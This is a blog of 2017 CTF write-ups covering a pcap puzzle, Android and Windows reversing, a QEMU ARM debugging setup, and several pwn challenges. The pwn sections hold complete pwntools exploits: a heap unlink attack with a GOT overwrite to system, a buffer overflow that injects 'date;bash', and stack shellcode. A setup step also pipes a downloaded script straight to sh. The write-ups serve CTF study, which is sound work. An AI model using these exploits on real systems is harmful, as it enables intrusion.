20171007_kasperskyCTF

This weekend, I challenged to kasperskyCTF 2017 (https://ctf.kaspersky.com/contests/1/tasks/).

I solved network chall 300 Rocket Science. I write down how to solve it.

 

In this chall, one pcap file is given. Chall description is as below picture.

 

 

 

Let’s look at this file by wireshark. This file contain several kinds of packet, but almost packets are UDP.

(You can see those statistics in Statistics -> Protocol Hierarchy)

 

 

I filtered packet as “udp && ip.addr == 192.168.0.2” and extract specific UDP packets.

At first, I find the word of “en100par.bin” in below picture.

 

 

So I think binary of this file is in follow packets, then I try to find out this binary. In follow packets, I can see 192.168.0.2 send many 242 bytes packets.

And it seems to contain binary like data. (Highlighting area in below picture is payload data of UDP.)

 

  

 

I guess I can get whole binary by collecting those data, but it seems contain certain protocol that wireshark cannot analyze of header and footer.

So I have to find out area of header and footer.

 

For comparing each packet, I find out that like below format. (if there is no of few difference bytes, these bytes may be header or something like this. And also I guess last 2bytes is odd because before bytes \x00 and next packet’s first byte is also \x00 or something like that. So I guess these byte may be footer or checksum.)

0000   00 0f bb 23 39 82 00 50 56 8a 21 b1 08 00 45 00
0010   00 e4 5b 84 40 00 80 11 00 00 c0 a8 00 02 c0 a8
0020   00 c9 c3 50 c3 50 00 d0 82 fd 27 11 00 03 00 ba        ether and IP header
0030   43 ec 10 00 02 36 0c b8 ff 00 00 00 00 07 00 00        header of the protocol  (like timestamp)
0040   00 00  49 45 43 36 31 38 35 30 00 00 00 00 00 00        payload of the protocol
0050   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0060   00 00 00 00 00 00 00 21 8f 3f be 32 31 30 37 31
0070   35 32 30 32 34 35 33 36 30 31 00 08 01 00 00 11
0080   76 00 00 18 02 d9 00 00 00 4c 01 00 00 14 25 02
0090   00 00 02 00 00 00 0c 27 02 00 00 34 26 00 00 0f
00a0   5b 28 00 00 7e 15 00 00 18 d9 3d 00 00 7e 15 00
00b0   00 0e 57 53 00 00 72 0a 00 00 0b c9 5d 00 00 06
00c0   00 00 00 0d cf 5d 00 00 ea 00 00 00 04 b9 5e 00
00d0   00 5b 00 00 00 10 14 5f 00 00 98 02 00 00 11 ac
00e0   61 00 00 94 02 00 00 1a 40 64 00 00 44 00 00 00    
00f0   ba aa                                                    footer of the protocol

 

Finally I extract payload of each packet and combined them.

Advertisements

How to do heap exploit:House of Einherjar (CSAW 2017 Auir Pwn200)

Recently I tried to solve CSAW’s chall (Auir Pwn200). In many writeup, it was solved by fastbin attack.

I’ll try to solve this by unsortedbin unlink attack known as House of Einherjar.

 

Analyzing binary

 

This binary is obfuscated a bit, so I need to analyze deeply.

At first, let’s run this binary. You can see some command, make, destroy, fix, and display zealots.

It’s seems to use heap…:-)

$ ./auir
|——————————-|
|AUIR AUIR AUIR AUIR AUIR AUIR A|
|——————————-|
[1]MAKE ZEALOTS
[2]DESTROY ZEALOTS
[3]FIX ZEALOTS
[4]DISPLAY SKILLS
[5]GO HOME
|——————————-|
>>

 

Then dissassemble it by IDAPro, there are main function and each command(make, destroy, fix, and display) function.

 

  1. Main function: print menu and call each comand function
  2. make_function: alloc heap and input skill.
  3. destroy_function: free selected heap location, but pointer doesn’t set NULL (<-UAF)
  4. fix_function: change skill of selected zalot, but it doesn’t use realloc, so it can write over area.
  5. display_function: print skill but only 8byt.

 

Zalot’s information pointers is in buf in bss, and it point to heap area. This relation is as below.

When destroy function is called, buf pointer doesn’t set NULL, so UAE occur.

 

Exploitation technique

 

Before explain exploitation of this file, I show about unsortedbin unlink attack known as House of Einherjar.

This is the method of heap exploitation by using unlink attack and heap overflow.

More detail is as URL (https://www.slideshare.net/codeblue_jp/cb16-matsukuma-en-68459606)

 

Normal unlink behavior is as below figure. You notice that unsorted-bin chunk create when chunk that size is more than 0x80 free.

(chunk less than 0x80 is stored in fast-bin link list)

 

 

To exploit, I should create faked chunk as below figure.

When unlink, be careful as area that X point, because malloc return address usually point prev_size address+0x10. So sometimes adjust X pointed address to prev_size address of faked chunk when make it.

 

 

 

 

 

Then unlink is occurred, X pointer point X-0x18. If I can write X and X-0x18, I can overwrite anywhere in memory.

 

 

 

Pwn the binary

 

At first, I need to leak libc address. Fortunately, I can get address by free-ing chunk, because main_arena address is set in chunk data area once free chunk.

Below figure is heap dump when free chunk. Main arena address is shown in read rectangle.

 

 

The code that leak libc address is as below.

from pwn import *
DEBUG =1
if DEBUG == 1:
    r = remote(‘127.0.0.1’ ,1337)
else:
    r = remote(‘pwn.chal.csaw.io’, 7713)
raw_input()
def make(size, skill):
    r.sendline(“1”)
    l = r.recvuntil(“>>”)
    print l
    r.sendline(str(size))
    l = r.recvuntil(“>>”)
    print l
    r.sendline(skill)
    l = r.recvuntil(“>>”)
    print l
def destroy(index):
    r.sendline(“2”)
    l = r.recvuntil(“>>”)
    print l
    r.sendline(index)
    l = r.recvuntil(“>>”)
    print l
def fix(index, size, skill):
    r.sendline(“3”)
    l = r.recvuntil(“>>”)
    print l
    r.sendline(index)
    l = r.recvuntil(“>>”)
    print l
    r.sendline(str(size))
    l = r.recvuntil(“>>”)
    print l
    r.sendline(skill)
    l = r.recvuntil(“>>”)
    print l
def display(index):
    r.sendline(“4”)
    l = r.recvuntil(“>>”)
    print l
    r.sendline(index)
    l = r.recvuntil(“>>”)
    return l
#leak address
make(0x90, “aaaaaaaaaaaaaaaaaaaa”)       #    -> make chunkA
make(0x90, “aaaaaaaaaaaaaaaaaaaa”)       #    -> make chunkB
destroy(“0”)                                           #    -> free chunkA *Not free chunkB because freed chunk is not created.*
l = display(“0”)                                        #    -> leak main arena address that is set in chunkA data area.
libc_addr = u64(l.split(“\n”)[1].split(“|——————————-|”)[0].ljust(8,”\x00″))-0x3c4b78

 

 

Then let’s exploit it. First I make 6 chunk.

make(0x90, “aaaaaaaaaaaaaaaaaaaa”)
make(0x90, “aaaaaaaaaaaaaaaaaaaa”)
make(0x90, “aaaaaaaaaaaaaaaaaaaa”)
make(0x90, “BBBBBBBBBBBBBBBBBBBB”)
make(0x90, “CCCCCCCCCCCCCCCCCCCC”)
make(0x90, “CCCCCCCCCCCCCCCCCCCC”)
display(“4”)

 

 

And previous figure’s X is 0x605340 in this binary. because this address can point faked chunk, and I can overwrite this and 0x605340-0x18 by fix command.

 

 

Then create fake free chunk.

bof = “A”*18*8+p64(0xa0)+p64(0xb1)
fix(“4”, 0x900, bof)
bof = p64(0)+p64(0x91)+p64(0x605340-0x18)+p64(0x605340-0x10)+”A”*14*8+p64(0x90)+p64(0xa0)
fix(“6”, 0x900, bof)
display(“1”)

 

To make X(0x605340) point top of chunk address, I change the size of 5th(0xa0->0xb0)/6th(0xa0->0x90) chunk.

 

 

And unlink it, and overwrite address.

destroy(“5”)    # -> unlink
# overwirte X-0x18
binsh_addr = libc_addr +0x18cd17
fix(“6”, 0x20, p64(0x605060)+p64(binsh_addr))
display(“1”)
# overwrite free got to system address
system_addr = libc_addr+ 0x45390
iostream_a_addr = libc_addr+0x9dfcf0
iostream_b_addr = libc_addr+0x9f6d80
iostream_c_addr = libc_addr+0x9f7b30
fix(“3”, 0x60, p64(system_addr)+p64(iostream_a_addr)+p64(iostream_b_addr)+p64(iostream_c_addr))
r.sendline(“2”)
l = r.recvuntil(“>>”)
print l
r.sendline(“4”)
r.interactive()

 

 

Finally I get the flag.

>>
[*]WHICH ONE DO YOU WANT TO DESTROY?
>>
[*] Switching to interactive mode
[*]BREAKING….
$
$
$
$ ls
auir
flag
$ cat flag
flag{W4rr10rs!_A1ur_4wa1ts_y0u!_M4rch_f0rth_and_t4k3_1t!}
[*] Got EOF while reading in interactive
$
Ref:

20170915_ctf-t CTF Writeup

 

Yesterday, I joined CTF-T CTF(http://sect.ctf.rocks/dashboard/challenges/). I solved only 1 pwn, other challs are so difficult for me :-(.

Pwn50 Date

 

At first, let see this chall. First I login to server, only plot date formatted string, and then I send many characters, SEGV is occeered.

So I may be able to get RIP by buffer overflow.

 

$ nc pwn2.sect.ctf.rocks 6666

Sat Sep 16 00:46:03 UTC 2017

Sat Sep 16 00:46:18 UTC 2017

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

/home/ctf/redir.sh: line 2: 19647 Segmentation fault      (core dumped) ./chall

 

 

 

So let’s investigate binary deeply. As below image, In main func, This check if command pointer contain “date”, its true, execute system function. 

 

 

 

In another section of main function, I can write byte_6010A4 in Fill buffer without limit, so I can do buffer overflow in this point.

Fortunately There is command pointer below of byte_6010A4, So I can overwrite this.

 

 

My method of exploitation is as below

 

– At the point of Filll buffer, Overwrite byte_6010A4  with command “date;bash\x00” (to pass strstr function) and fill “A”.

– Overwrite command pointer to point to command “date;bash\00”.

– Finally execute command “date;bash\00”.

 

Actually, I can’t see print messages without date string, when I connect to server.

So I send “A”*1500 to input first read_line at first.

from pwn import *
DEBUG = 0
if DEBUG == 1:
    r = remote(‘127.0.0.1’ ,1337)
else:
    r = remote(‘pwn2.sect.ctf.rocks’, 6666)
 
raw_input()
r.recvuntil(“2017”)
bof = “A” *1500
r.sendline(bof)
r.recvuntil(“2017”)
bof = “A”*12+”date;bash\x00″+”A”*(516-22)+p64(0x6010b0)
r.sendline(bof)
r.interactive()

 

 

 

$ python solve_date.py
[+] Opening connection to pwn2.sect.ctf.rocks on port 6666: Done
[*] Switching to interactive mode
Fri Sep 15 08:03:34 UTC 2017
$
$
$
$ ls
chall
flag
redir.sh
$ cat flag
SECT{wh0a_one_Byte_overflow_so_pewpew}
$

 

How to make cross compile environment for PWN

How to make cross compile environment for PWN

Sometimes there is non-x86/x86-64 pwn chall in CTFs, but I usually don’t have cross-compiled gdb and more useful tools.

So I tried to make such environment, and share in this blog. (It is the case of arm architecture, Ubuntu 16.04)

 

Prepare QEMU

At first, prepare qemu file that run arm system image.

 

$ sudo apt-get install qemu-system-arm

Then I need to create arm system image, but it is difficult to make image… 😦

So I use images in this URL, http://ift.tt/1rhdt7R. There are some nice cross-compiled images to emulate.

I donwload debian_wheezy_armel_standard.qcow2, initrd.img-3.2.0-4-versatile, vmlinuz-3.2.0-4-versatile.

 

I also install GEF to enhance gdb command. http://ift.tt/1Df1ZFr

$ wget -q -O- http://ift.tt/1TsitBo| sh

 

Emulate image file

Then, I execute qemu to emulate this image by below command.

qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append “root=/dev/sda1” -redir tcp:1234::1234 -redir tcp:10022::22 -redir tcp:1337::1337

 

In this case, I use prot 10022/22 for ssh, port 1337/1337 for target pwned program, port 1234/1234 for gdbserver/gdb.

Once pop-up qemu window, I can use shell in emulated machine.

 

prepare for debug

First I need to install several tools for debug. I install gdb-server, 

 

Run dbg

In arm emulated machine, run target pnwed program by socat, and run gdb server with prot 1234.

1st terminal
# ssh root@127.0.0.1 -p 10022
 -> ssh to emulated machine
# socat tcp-listen:1337,fork exec:./target_pwned

 

Then, connect to socat based server.

2nd terminal

# nc 127.0.0.1 1337

-> connect to socat

 

Once connect to server, login emulated machine again, and check PID of target pwned program, and execute gdbserver.

3nd terminal
# ssh root@127.0.0.1 -p 10022
 -> ssh to emulated machine
# ps -ef
 -> check PID of ./target_pwned
# gdbserver 10.0.2.15:1234 –attach [PID]

 

Then I run gdb in host machine, and connect to emulated machine.

4th terminal

$ gdb-muitiarch -q

> set architecture arm
> file target_pwned
> target extended-remote localhost:1234
> set remote exec-file /root/target_pwned
> break main
> run

 

Congras! Finally I can debug arm based program 🙂

 

20170701_SECUINSIDECTF Writeup

20170701_SECUINSIDECTF Writeup

Yesterday and today, I joined in 20170701_SECUINSIDECTF. There were many difficult problems, and unsolved one.

Fortunately, I could solve 2problem, OHCE and SNAKE. I wrote my solution below.

OHCE pwn

 

This is Stack base overflow chall. This process as below.

 

– First print menu, and I can choose 1. echo 2, reverse echo, 3.exit

– if choose 1, I can type something, and return echo

– if choose 2, I can type something, and return reverse string I typed

– if choose 3, exit program

 

Let’s analyze it. And realize that this don’t have any protection,

 

$ checksec ohce
[*] ‘/mnt/hgfs/VM-Share/20170701_SECUINSIDECTF/ohce/ohce’
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE

 

Next, I continue to execute it, several minutes, I find out that there is Null Byte Termination Vulnerability.

If I input 31+32*n chars in echo mode, next data is leaked. And when I input it in reverse echo, program is halted.

—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�?Hc�
—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 2
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�cH?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSegmentation fault (core dumped)

 

What’s happened? Below picuture show that stack information when input 31+32*n chars.

(In this picture unfortunately data of 0x7fffffffdae0 is 00, so this leak don’t occurred…)

 

 

Then reverse echo, because of Null Byte Termination Vulnerability, I can overwrite next address.

Finally overwritten address become esp in [0x400268 mov rsp,rbp], I can got rip.

 

Exploitation is below.

– First leak stack address to write 31 chars in echo

– Next write many chars and stack address to go to shellscript (address in red rectangle) in echo

– Write shellscript and stack address to go to below address (address in light blue rectangle) in reverse echo.

 

 

 
$ python solve_ohce.py
[+] Opening connection to 13.124.134.94 on port 8888: Done
—————–
\x001. echo
2. echo(Reverse)
3. Exit\x00
—————–
\x00 >
0x7ffe4db737a0
0x7ffe4db73770
\x7f\xfeM\xb76`AAAAA\x05\x0f;\xb0^TWR\x99_TS��H\xff\x97\x8cБ\x96\x9dѻH�1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
[*] Switching to interactive mode
\x00\x7f\xfeM\xb77\xa0
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901�H\xbbѝ\x96\x91Ќ\x97\xffH��ST_\x99RWT^\xb0;\x0f\x05AAAAA`6\xb7M\xfe\x7f$
$
$
$
$
$ ls
flag
ohce
$ cat flag
SECU[the_true_world_and_1n_here_1s_the_dream]
[*] Got EOF while reading in interactive
$
 

SNAKE rev

 

This is the old snake game program.

Several hours investigation, I recognize that this algorithm is as below. (function name is named by me.)

 


 

This program calculate enc_flag and xor-ed another data in clear_game function.

At first, I tried to make script to make those data, but I can’t do this. So I change my direction as below.

 

– I patch program to return true on if(judge_goal) statement.

 

 

 

– I patch program not to change time_duration.

 

 

Then execute it, After several minutes, I can get flag. (You must control snake not to crash to wall until getting flag.)

 

 

 

 

 
SECU[hack_is_the_wine_of_life._Let’s_drink_it.]�u����@
 
 
Patched program:

 

20170624_TMCTF

20170624_TMCTF

 

TMCTF has many Windows based chall and network chall, So I learned about windows reverse method in this ctf. I got 4challs and writeup are below.

 

Reverse 100

 

At first, I get zip file. Using file command, I realize that this file is rar file. So change extension of the file to .rar and extract it.

Then exitract, 2 files is given, biscuit1, biscuit2. biscuit1 is PE32 file and Biscuit2 is password locked zip file. 

$ file biscuit*
biscuit1:     PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
biscuit2:     Zip archive data, at least v2.0 to extract

 

First execute biscuit1.exe, and output is below. I think password of biscuit2.zip is in biscuit1.exe.

>biscuit1.exe
Please find sweets name starting from m for biscuit2.

 

Let’s see this in Ida Pro.

 

 

I understand that I break near leave and can see password in x64dbg.

 

I got password of this. Then I extract 3files and file command to each file.

$ file biscuit*
biscuit3:     JPEG image data, JFIF standard 1.01, aspect ratio, density 1×1, segment length 16, comment: “Optimized by JPEGmini 3.13.3.15 0x411b5876”, baseline, precision 8, 150×150, frames 3
biscuit4:     ASCII text, with CRLF line terminators
biscuit5:     PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

 

First biscuit3 is JPG, but some odd data(Zip file) is in last part. After extraction, There is 1 text file “cream”

 

Biscuit4 is txt file, “Flag = TMCTF{biscuit3_ biscuit5}”

 

Biscuit5 is PE file too, So analyze file by the same way of biscuit1 and get the string, So finally get the flag.

(TMCTF{biscuit3_ biscuit5} is wrong, TMCTF{biscuit5_biscuit3} is correct, I spend some time to realize that :-()

 


Analysis-Offensive 100

 

I’m given Forensic_Encyption file, and this file is zip file. Then extract it, there are 3 files.

File1 is jpg, fille2 is password locked zip file, file3 is pcap fille. At first, I survey file1, there is some odd string as below. 

 

 

Bese64 decode this string, and put it into fille2 password form, I can extract key.txt. Key.txt seems ESP encryption/Authentication key.

$ echo “VHVyaW5nX01hY2hpbmVfYXV0b21hdG9u” | base64 -d
Turing_Machine_automaton
 
$ cat key.tet
src 192.168.30.211 dst 192.168.30.251
        proto esp spi 0xc300fae7 reqid 1 mode transport
        replay-window 32
        auth hmac(sha1) 0x2f279b853294aad4547d5773e5108de7717f5284
        enc cbc(aes) 0x9d1d2cfa9fa8be81f3e735090c7bd272
        sel src 192.168.30.211/32 dst 192.168.30.251/32
src 192.168.30.251 dst 192.168.30.211
        proto esp spi 0xce66f4fa reqid 1 mode transport
        replay-window 32
        auth hmac(sha1) 0x3bf9c1a31f707731a762ea45a85e21a2192797a3
        enc cbc(aes) 0x886f7e33d21c79ea5bac61e3e17c0422
        sel src 192.168.30.251/32 dst 192.168.30.211/32

 

So I put those information into file3 by wireshark as below.

 

Then ESP packets are decrypted, and I can find below information.

 

After some investigation, I find that those information is related to enigma crypto. So I decode it by using below site.

https://people.physik.hu-berlin.de/~palloks/js/enigma/enigma-m4_v16_en.html

 

 

 


 

misc100

I get 1 pcap file but header of the file is wrong, so I change first 4byte of header A1B2C3D4 to D4C3B2A1.

To do so, I can open wireshark.First I find that some SSL/FTP packets. In traffic of FTP, SSL pre-master secret log is sent, so I save this file and decrypt SSL traffic by using below way.

In the Wireshark configuration menu Edit -> Preferences -> Protocols -> SSL,
    1. In the “Pre-Shared-Key” field, enter Kpsa, i.e. 1a2b3c4d5e6f7a8b
    2. In the (Pre)-Master-Secret log filename field, enter the name of a text file which includes Client Random (32 bytes as 64 hex characters) and the Master          
       Secret (48 bytes as 96 hex characters) as a text line as follows:
             CLIENT_RANDOM <space> 64-characters-random <space> 96-characters-Master-Secret
 
After decryption, I find some html /jpg / css. When I open this html, I can see below page.

 

In this page’s source, There is some odd string ” <samp>HINT: visual cryptgraphy</samp>”.  I realize that I need to decode the flag by using visual cryptography 2 pictures seem like mosaic.

Finally I got flag. (To extract, I use the site to extract base64-ed image: http://ift.tt/2t9HzQj)


Reverse 200

 

I can get some odd text file. After some investigation (by googling “ASK/Manchester Clock 64″), I realize that this is output of RFID tag’s bit stream.

How can I get tag number? Accoding to this site http://ift.tt/2t9Qcuq, Output bitstream is repeated tag information by dividing “111111111”, so I extract tag information (part of green letters in below) and calculate it.

Using Clock:64, Invert:0, Bits Found:625
ASK/Manchester – Clock: 64 – Decoded bitstream:
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101

 

Below script is calculating method.

str = [0b11110 ,0b11101 ,0b11101 ,0b11011 ,0b11011 ,0b11101 ,0b11000 ,0b10100 ,0b11110 ,0b11101]
for i in str:
    print hex(i>>1)

 

20170617_googleCTF

20170617_googleCTF

Last week, I joined googleCTF, but I couldn’t solve only 2 chall :-(.  I make writeup of chall I solve.

 
Food
 

This is RE chall and at first, I am given android apk file “food.apk”.

At first dissassemble this file in online service: http://ift.tt/1H4YAZ1.

And get source file. After some investigate, I realize that FoodActivity class execute System.loadLibrary(“cook”) in com/google/ctf/food.

Then I check libcook.so in lib/x86/ by IDA Pro.

 

In this JNI_OnLoad ection, so many values move to stack and execute dec_str function (I named).

 

Then I try to find out what this function do, and recoginize it as beolw.

# divide int to 4-byte value
def parse_to_byte(val):
    byte = []
    byte.append((val>>24)&0xff) # BYTE3
    byte.append((val>>16)&0xff) # BYTE2
    byte.append((val>>8)&0xff) # BYTE1
    byte.append((val)&0xff)
return byte
 
string = “”
 
# decrypt 
for i in str:
    byte_array = parse_to_byte(i)
 
    string += chr(byte_array[0]^byte_array[1])
    string += chr(~((byte_array[2] | ~byte_array[3]) & (byte_array[3] | ~byte_array[2])))
 
print string[::1]
 
#str = [0x1D650B6E, 0x1377416F, 0x16724D62, 0x5320096C, 0x5691D74, 0x86E5A75, 0x4420046B, 0x6F096F, 0x4D634620, 0x10640D6E, 0x4F614520, 0x0A660265, 0x0A650D62, 0x47204A64, 0x36E1A75, 0x0C6F5D72, 0x6675420, 0x4650C68, 0x5B744120, 0x10640564, 0x25410F20]
# -> “/data/data/http://ift.tt/2tisMQq”

 

Then area of 0x00001640+0x15a8 write to d.dex file.

 

And finally call sub_710 function.

 

After analyze of this function, I realize that this function replace one part of d.dex file to another data. 

Inspected source of this function is as below

 

 

Data to replace is in the 0x000015A0+0x90 and xor-ed it by 0x5a.

So I replace this data to d.dex by binary editor manually. And decompile d.dex again by online service.

 

Then I can find 4 files in com/google/ctf/food directory. In C0000F class, flag value and cc() function.

And in cc() function C0004.m0() function caluculate flag and this.f2k.

I can calculate this.f2k by xor-ing bArr and “\u0013\u0011\u0013\u0003\u0004\u0003\u0001\u0005”, So I can find out flag by execute C0004.m0(flag, this.f2k).

I make java file of m0 function, and execute it. (java source is below link)

https://github.com/nacayoshi00/CTF-writeup/blob/master/20170617_googleCTF/solve_.java